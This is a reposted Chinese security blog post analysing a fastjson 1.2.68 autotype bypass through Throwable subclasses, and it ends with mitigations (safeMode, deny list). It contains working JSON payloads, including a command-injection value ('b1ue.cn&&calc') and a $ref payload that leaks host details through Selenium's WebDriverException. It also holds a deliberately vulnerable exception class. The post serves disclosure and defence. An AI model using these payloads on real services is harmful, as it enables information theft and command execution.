fastjson 1.2.68 最新版本有限制 autotype bypass

关于漏洞

该漏洞和以往的 autotype bypass 不同,要求 gadget 必须继承自 Throwable 异常类,所以常见的 JNDI gadget 就无法在此处使用。

所以只能找在异常类中的构造方法、set方法、get方法、toString等方法内的敏感操作才会触发漏洞。

由于异常类中很少使用高危函数,所以我目前还没有找到可以 RCE 的 gadget,只找到了几个非 RCE 的 gadget。

漏洞分析

反序列化时如果遇到 @type 指定的类为 Throwable 的子类那对应的反序列化处理类就是 ThrowableDeserializer

fastjson 1.2.68 最新版本有限制 autotype bypass

漏洞点在 ThrowableDeserializer#deserialze

fastjson 1.2.68 最新版本有限制 autotype bypass

当第二个字段的 key 也是 @type 的时候就会取 value 当做类名做一次 checkAutoType 检测。

调用 ParserConfig#checkAutoType
时注意第二个参数,它指定了第二个参数 expectClass 为 Throwable.class 类对象,通常情况下这个参数都是 null。

checkAutoType 一般有以下几种情况会通过校验。


1.
白名单里的类


2.
开启了 autotype


3.
使用了 JSONType 注解


4.
指定了期望类(expectClass)


5.
缓存 mapping 中的类

1.2.68 又更新了一个使用了 ParserConfig.AutoTypeCheckHandler  接口通过校验的类。

这个漏洞实际上就是基于第四种,指定了期望类的情况。

fastjson 1.2.68 最新版本有限制 autotype bypass

这里判断了如果期望类不为空且反序列化目标类继承自期望类就会添加到缓存 mapping 并且返回这个 class。

fastjson 1.2.68 最新版本有限制 autotype bypass

autotype 检测通过后就会开始实例化异常类对象。

同时把 message 和 cause 传给了 ThrowableDeserializer#createException 处理。

fastjson 1.2.68 最新版本有限制 autotype bypass

依次按照以下顺序进行实例化
构造方法参数1类型为String.class且参数2类型为Throwable.class,如果找不到就按照参数1类型为String.class,还找不到就取无参构造方法。

fastjson 1.2.68 最新版本有限制 autotype bypass

最后为被实例化后的异常类装配属性。

遍历 otherValues ,按照 key 去调用异常类的 set 方法,otherValue 是当前 jsonobject 对象中除了 @type、message、cause、stackTrace 以外的其他字段。

例如 @type 的类是 java.lang.Exception,otherValues 的第一条是 "msg"=>"hello"。

那么这里就会先去实例化 Exception 对象,再去调用 exception.setMsg("hello")

这里就是 set 触发的地方,而get方法则会在 JSON 转 JSONObject 的时候会调用该异常类的所有 get 方法。

也可以通过 $ref 字段借助 JSONPath 去访问 get 方法,关于 JSONPath ,我在博客中的另一篇“fastjson 1.2.62 拒绝服务漏洞”文章中有提到过。

问题分析完了,下面就是如何去寻找合适的 gadget 触发漏洞了。

我自己先写一个存在问题的异常类,去验证一下问题。

public class PingException extends Exception {


private String domain;


public PingException() {

super();

}


public String getDomain() {

return domain;

}


public void setDomain(String domain) {

this.domain = domain;

}


@Override

public String getMessage() {

try {

Runtime.getRuntime().exec("cmd /c ping "+domain);

} catch (IOException e) {

return e.getMessage();

}


return super.getMessage();

}

}

构造的 JSON 如下

{"@type":"java.lang.Throwable", "@type":"PingException","domain":"b1ue.cn&&calc"}

fastjson 1.2.68 最新版本有限制 autotype bypass

当然这只是用来测试的,真实情况很少有人把执行命令的方法写进异常类。

不过我找到了 selenium 的一个敏感信息泄露,selenium 一般用来操控浏览器进行爬虫,在很多基于浏览器操作的爬虫项目里都会使用到 selenium,如果同时也使用了 fastjson ,就会存在敏感信息泄露的问题。

org.openqa.selenium.WebDriverException
会输出这些信息
主机IP、主机名、系统名、系统架构操作系统版本、java版本、Selenium版本、webdriver驱动版本等等一系列信息。

同时由于是异常类,父类的 getStackTrace() 也会被调用,会输出当前方法栈信息,可从中看出使用了什么框架。

fastjson 1.2.68 最新版本有限制 autotype bypass

这是反序列化 org.openqa.selenium.WebDriverException
类输出的信息。

场景复现

我写了一个贴近真实场景的 Demo 用于模拟如何从中获取到敏感信息。

源码已经上传到了
iSafeBlue/fastjson-autotype-bypass-demo [1]

fastjson 1.2.68 最新版本有限制 autotype bypass

这是一个留言板的 Demo 我在依赖中加了最新版的 fastjson 和 selenium。

fastjson 1.2.68 最新版本有限制 autotype bypass

我通过调用留言接口,让他解析我的 json,来获取敏感信息。

{

"name":"tony",

"email":"tony@qq.com",

"content":{"$ref":"$x.systemInformation"},

"x":{

"@type":"java.lang.Exception","@type":"org.openqa.selenium.WebDriverException"

}

}

这里我用到了 $ref 字段来调用异常类对象的 getSystemInformation 方法把值引用到 content 字段。

所以留言内容输出的就是当前系统的敏感信息了。

除此之外其实还可以有其他用途,例如可以绕过类对象的访问。

举个例子,某个异常类的get方法返回的对象类型是DataSource,这个类型肯定是不允许被反序列化的,但他在异常类中被传来的允许被反序列化的类对象构造成了一个
DataSource 对象。当再去调用get方法访问这个 DataSource 的时候,fastjson 就管不着了。

这种例子我在apache abdera的一个异常类中见到过。

/org/apache/abdera/server/exceptions/AbderaServerException.java [2]

public class DatasourceException extends Exception {


public DatasourceException() {


}


private DataSource dataSource;


public DataSource getDataSource() {

return dataSource;

}


public void setDataSource(URL url) {

this.dataSource = new URLDataSource(url);

}

}

这个异常类中,setDataSource 的参数是 URL 类型,在 fastjson 中是允许被反序列化的。也就是说可以调通 setDataSource 方法,并且实例化了一个 URLDataSource 对象。然后我可以通过 JSONPath 的功能再去调用他的 getDataSource().getInputStream() ,这样就会触发 URL 连接请求。

fastjson 1.2.68 最新版本有限制 autotype bypass

修复方案


开启 safeMode

ParserConfig.getGlobalInstance().setSafeMode(true);


添加黑名单

ParserConfig.getGlobalInstance().addDeny("org.openqa.selenium");

References

[1]
iSafeBlue/fastjson-autotype-bypass-demo: https://github.com/iSafeBlue/fastjson-autotype-bypass-demo

[2]
/org/apache/abdera/server/exceptions/AbderaServerException.java: https://github.com/apache/abdera/blob/43fae3a0bb450895042bf0825f11fbf39832e830/server/src/main/java/org/apache/abdera/server/exceptions/AbderaServerException.java

原文 

http://mp.weixin.qq.com/s?__biz=Mzg4OTExMjE2Mw==&mid=2247483796&idx=1&sn=30cd2e26de6f9f0aad97c6c42ba40cee

本站部分文章源于互联网,本着传播知识、有益学习和研究的目的进行的转载,为网友免费提供。如有著作权人或出版方提出异议,本站将立即删除。如果您对文章转载有任何疑问请告之我们,以便我们及时纠正。

PS:推荐一个微信公众号: askHarries 或者qq群:474807195,里面会分享一些资深架构师录制的视频录像:有Spring,MyBatis,Netty源码分析,高并发、高性能、分布式、微服务架构的原理,JVM性能优化这些成为架构师必备的知识体系。还能领取免费的学习资源,目前受益良多

转载请注明原文出处:Harries Blog™ » fastjson 1.2.68 最新版本有限制 autotype bypass

赞 (0)
分享到:更多 ()

评论 0

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址